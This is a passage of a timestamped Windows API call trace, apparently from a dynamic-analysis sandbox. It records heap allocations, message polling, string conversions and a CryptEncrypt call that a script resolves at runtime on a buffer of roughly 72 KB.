Size=0x8) returned 0x2e54cc8 [0220.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0220.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x119e6) returned 0x2f24820 [0220.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0220.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f24820 | out: hHeap=0x970000) returned 1 [0220.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0220.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0220.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0220.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0220.464] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0220.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0220.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0220.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0220.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0220.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0220.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0220.464] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0220.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04150 [0220.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0220.465] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0220.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04150 | out: hHeap=0x970000) returned 1 [0220.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0220.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0220.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cc8 [0220.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0220.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0220.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0220.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0220.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x119e6) returned 0x2f24820 [0220.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0220.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54dc8 [0220.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0220.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0220.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0220.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e550a8 [0220.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0220.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0220.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0220.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54f68 [0220.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0220.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0220.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0220.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ea8 [0220.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f468 [0220.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0220.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0220.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0220.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0220.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x119e6) returned 0x2e80330 [0220.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3a0 [0220.468] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.468] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.468] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.468] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.469] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.469] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.469] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0220.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3f0 | out: hHeap=0x970000) returned 1 [0220.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0220.469] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0220.469] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0220.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f045e8 | out: hHeap=0x970000) returned 1 [0220.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0220.469] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0220.469] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0220.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0220.469] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0220.469] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0220.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04070 | out: hHeap=0x970000) returned 1 [0220.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0220.470] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0220.470] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0220.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0220.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0220.470] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0220.470] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.470] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.470] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b48 | out: hHeap=0x970000) returned 1 [0220.470] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.470] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0220.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04658 | out: hHeap=0x970000) returned 1 [0220.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0220.470] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0220.471] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0220.471] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0220.471] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e514a8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0220.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0220.472] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0220.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0220.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0220.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e7f3f0 [0220.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0220.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0220.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0220.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0220.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0220.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0220.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552f8 [0220.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0220.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0220.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0220.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0220.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0220.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0220.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552f8 | out: hHeap=0x970000) returned 1 [0220.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3f0 | out: hHeap=0x970000) returned 1 [0220.473] CryptEncrypt (in: hKey=0xa87250, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x119e6, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x119e8) returned 1 [0220.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e564e0 [0220.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f6e8 [0220.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55158 [0220.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0220.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0220.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0220.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552c8 [0220.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0220.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552c8 | out: hHeap=0x970000) returned 1 [0220.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0220.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0220.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0220.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0220.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55148 [0220.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0220.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55148 | out: hHeap=0x970000) returned 1 [0220.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0220.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0220.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0220.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0220.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55278 [0220.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0220.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55278 | out: hHeap=0x970000) returned 1 [0220.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0220.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0220.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0220.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0220.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55248 [0220.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0220.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55248 | out: hHeap=0x970000) returned 1 [0220.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0220.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0220.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0220.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0220.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552c8 [0220.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0220.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552c8 | out: hHeap=0x970000) returned 1 [0220.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0220.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0220.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0220.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0220.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55118 [0220.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0220.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55118 | out: hHeap=0x970000) returned 1 [0220.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0220.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0220.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0220.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0220.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55128 [0220.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0220.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55128 | out: hHeap=0x970000) returned 1 [0220.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0220.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0220.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0220.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0220.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55228 [0220.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0220.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55228 | out: hHeap=0x970000) returned 1 [0220.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0220.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0220.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0220.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0220.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0220.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0220.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0220.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0220.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3c8 | out: hHeap=0x970000) returned 1 [0220.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0220.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0220.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0220.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0220.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0220.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0220.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0220.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0220.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0220.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0220.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0220.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0220.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0220.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0220.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0220.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0220.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0220.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0220.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0220.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0220.477] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0220.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0220.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0220.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0220.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0220.477] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.478] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0220.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0220.478] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0220.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0220.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0220.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0220.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0220.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0220.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0220.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0220.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0220.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0220.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0220.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3c8 [0220.478] CharLowerBuffW (in: lpsz="byte[72168]", cchLength=0xb | out: lpsz="byte[72168]") returned 0xb [0220.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977ae8 [0220.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0220.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0220.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0220.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0220.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0220.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0220.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0220.479] RtlAllocateHeap (HeapHandle=0x970000, 